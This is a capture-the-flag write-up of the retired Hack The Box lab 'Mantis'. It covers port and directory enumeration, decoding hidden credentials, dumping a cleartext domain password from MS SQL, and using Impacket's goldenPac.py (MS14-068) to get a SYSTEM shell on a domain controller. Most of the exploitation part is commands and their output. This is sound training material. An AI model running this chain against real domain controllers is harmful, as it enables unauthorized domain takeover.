Today we are going to solve another CTF challenge, "Mantis", a retired lab from Hack The Box for practising penetration testing online. The challenges in this lab are not easy unless you already have some penetration-testing knowledge. Let's start and learn how to analyse a vulnerability in a network and then exploit it to retrieve the desired information.
Level: Intermediate
Task: find the user.txt and root.txt files on the victim's machine.
Since these labs are accessible online, they have static IPs. The IP of Mantis is 10.10.10.52, so let's begin with nmap port enumeration.
root@kali# nmap -sC -sV -oA nmap 10.10.10.52
# Nmap 7.70 scan initiated Tue May 7 13:08:49 2019 as: nmap -sC -sV -oA nmap 10.10.10.52
Nmap scan report for 10.10.10.52
Host is up (0.032s latency).
Not shown: 980 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-05-07 17:09:18Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-05-05T21:17:25
|_Not valid after:  2049-05-05T21:17:25
|_ssl-date: 2019-05-07T17:10:12+00:00; +2s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
8080/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49167/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 48m02s, deviation: 1h47m21s, median: 1s
| ms-sql-info:
|   10.10.10.52:1433:
|     Version:
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2019-05-07T13:10:15-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2019-05-07 13:10:12
|_  start_date: 2019-05-05 17:15:54

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 7 13:11:40 2019 -- 1 IP address (1 host up) scanned in 170.33 seconds
From the scan output above you can see that a large number of ports are open on the target. DNS, Kerberos (88), LDAP (389/636) and the global catalog ports (3268/3269) identify the host as a domain controller for htb.local (FQDN mantis.htb.local). It also runs Microsoft SQL Server 2014 Express on 1433 and an IIS 7.5 site on 8080 titled "Tossed Salad - Blog". Note that SMB message signing is reported as required, so SMB relay attacks are off the table and we need working credentials.
First of all, I browsed to the target on port 1337 (not listed in the scan output above, but it responds) and saw the default IIS7 page. Since there was no clue for the next step there, I moved on to directory brute forcing.
I used gobuster with DirBuster's directory-list-2.3-medium.txt wordlist for a directory brute-force attack on http://10.10.10.52:1337
root@kali:~/htb/mantis# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337 -o gobuster-mantis.log
=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.52:1337/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/05/08 06:22:22 Starting gobuster
=====================================================
/secure_notes (Status: 301)
As a result, I found a directory: /secure_notes
There I saw two files, dev_notes and web.config. The dev_notes text file is the interesting one, so let's open it.
The dev_notes file contains the setup notes shown below. They point to a database named "orcharddb" with an "admin" user, so now I only need the password to log into the database.
The full file name, "dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt", looked suspicious: "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" is base64, and the last line of the note ("SQL Server sa credentials file namez") hints that the file name itself carries the SQL Server credential. So I need to decode it to get the password.
root@kali:~/htb/mantis# curl http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez
The file name dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt contains base64-encoded text. Decoding it gives a string of hex digits:
root@kali:~/htb/mantis# echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
6d2424716c5f53405f504073735730726421
This looks like a hex string. Let’s convert it to ASCII:
root@kali:~/htb/mantis# echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!
After decoding the hex, I finally have the password for the admin user: m$$ql_S@_P@ssW0rd!
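The two-step decode above (base64, then hex) is one instance of a common CTF pattern: a secret hidden under several encoding layers. The following Python script is an added example and is not part of the original writeup. It peels layers automatically by testing the most restrictive alphabet first (binary, then hex, then base64), and it also decodes the binary "OrchardCMS admin creadentials" line from dev_notes, which the writeup leaves undecoded. Both input strings are copied from the file and file name shown above; the function names are my own.

```python
import base64
import re

# Inputs copied from the writeup: the base64 suffix of the dev_notes file name
# and the binary "OrchardCMS admin creadentials" line inside the file.
FILENAME_TOKEN = "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx"
ORCHARD_BITS = (
    "01000000011001000110110100100001011011100101111101010000"
    "0100000001110011011100110101011100110000011100100110010000100001"
)


def decode_binary(bits: str) -> str:
    """Turn a run of 8-bit groups into an ASCII string."""
    if len(bits) % 8:
        raise ValueError("bit string length is not a multiple of 8")
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8)).decode("ascii")


def peel(blob: str, max_layers: int = 5) -> list:
    """Strip encoding layers one at a time and return every intermediate value.

    Detection order matters: a binary string is also valid hex, and a hex
    string whose length is a multiple of 4 is also valid base64, so the most
    restrictive alphabet is tested first. Peeling stops at the first value
    that matches no alphabet or does not decode to printable ASCII, which
    is normally the plaintext secret.
    """
    stages = [blob]
    for _ in range(max_layers):
        cur = stages[-1]
        try:
            if set(cur) <= {"0", "1"} and len(cur) % 8 == 0:
                nxt = decode_binary(cur)
            elif re.fullmatch(r"[0-9a-fA-F]+", cur) and len(cur) % 2 == 0:
                nxt = bytes.fromhex(cur).decode("ascii")
            elif re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", cur) and len(cur) % 4 == 0:
                nxt = base64.b64decode(cur, validate=True).decode("ascii")
            else:
                break
        except (UnicodeDecodeError, ValueError):
            # Looked like an encoding but did not decode cleanly: stop here.
            break
        if not nxt.isprintable():
            break
        stages.append(nxt)
    return stages


if __name__ == "__main__":
    for label, blob in (("file name", FILENAME_TOKEN), ("OrchardCMS line", ORCHARD_BITS)):
        print(label + ": " + " -> ".join(peel(blob)))
```

The printable check is what keeps the loop from "decoding" a genuine password that happens to look like hex or base64; if a stage decodes to control characters, the previous stage was the real value.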
Using Impacket's mssqlclient.py we connect to the MS SQL server on port 1433 with the admin account and the password found above, then switch to the orcharddb database and look at the Orchard users table.
root@kali:~/htb/mantis# ./mssqlclient.py htb.local/admin@10.10.10.52
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password: m$$ql_S@_P@ssW0rd!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL> select @@version
Microsoft SQL Server 2014 - 12.0.2000.8 (X64)
    Feb 20 2014 20:04:26
    Copyright (c) Microsoft Corporation
    Express Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)
SQL> SELECT name FROM master..sysdatabases
master
tempdb
model
msdb
orcharddb
SQL> use orcharddb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: orcharddb
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'orcharddb'.
SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blog_Orchard_Users_UserPartRecord '
Id
UserName
Email
NormalizedUserName
Password
PasswordFormat
HashAlgorithm
PasswordSalt
RegistrationStatus
EmailStatus
EmailChallengeToken
CreatedUtc
LastLoginUtc
LastLogoutUtc
SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord
admin   AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==
James   J@m3s_P@ssW0rd!
SQL>
The admin row holds a hashed password, but the James row stores the password in the clear: J@m3s_P@ssW0rd!. James is also a domain user, so these credentials can be used against Kerberos.
Before that, we had manually added the target IP to our local hosts file (/etc/hosts) with the names htb.local and mantis.htb.local found through nmap, because Kerberos needs to resolve the domain controller by name.
Then we installed Impacket from GitHub with the command below.
git clone https://github.com/CoreSecurity/impacket.git
Impacket includes goldenPac.py, which exploits MS14-068 (the Kerberos PAC validation flaw) on an unpatched domain controller: given any valid domain user's password, it forges a PAC that claims Domain Admin membership, obtains a ticket with it, and then uses the resulting admin access to upload a binary to ADMIN$ and start it as a service, psexec-style. Execute the command below to get a SYSTEM shell on the victim.
root@kali:~/htb/mantis# goldenPac.py htb.local/james@mantis.htb.local
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password: J@m3s_P@ssW0rd!
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file wGWklYmG.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service AgUh on mantis.htb.local.....
[*] Starting service AgUh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

c:\Users\james\Desktop>type user.txt
8a8*****54d

c:\Users\Administrator\Desktop>type root.txt
209*****567
Author: Puckiestyle